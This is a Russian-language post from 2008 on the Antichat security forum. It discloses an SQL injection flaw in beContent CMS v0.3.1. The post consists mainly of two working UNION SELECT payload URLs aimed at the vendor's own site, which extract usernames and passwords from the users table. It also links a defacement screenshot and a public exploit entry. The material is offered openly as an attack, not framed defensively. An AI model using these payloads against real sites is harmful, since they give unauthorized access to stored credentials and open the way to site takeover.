ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу CMS beContent v0.3.1 SQLINJ
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

CMS beContent v0.3.1 SQLINJ
  #1  
Старый 25.06.2008, 15:08
Аватар для b3
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию CMS beContent v0.3.1 SQLINJ
www.becontent.org
уязвимость(бонально):
http://www.becontent.org/news.php?id=-3+union+select+1,concat_ws(0x3a,username,password) ,3,4+from+users
на данный момент там стоит последняя версия а месяца 2 назад офф сайт был под дефейсом, вот даже скринил:
http://sqlinj.com/owned/becontent.gif

скачать данную версию:
http://becontent.googlecode.com/files/beContent%20v031.zip

мдя...последняя версия так само уязвима:
http://www.becontent.org/page.php?id=-5+union+select+1,2,concat_ws(0x3a,username,passwor d)+from+users/*
Ктото прикорманить бажку решил)) :
http://www.milw0rm.com/exploits/5170
Greatz : Barakuda (GraBBerZ team)
Последний раз редактировалось b3; 25.02.2009 в 16:11..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Создание сайта на Cms!? Помогите выбрать движок!? AlexV ПО для Web разработчика 28 20.11.2008 23:35
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
Kasseler CMS 1.0.0 Lite vadim399 PHP, PERL, MySQL, JavaScript 1 31.12.2007 03:30
Faq по проектированию Cms k00p3r Обсуждение Ваших сайтов 0 09.08.2005 09:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ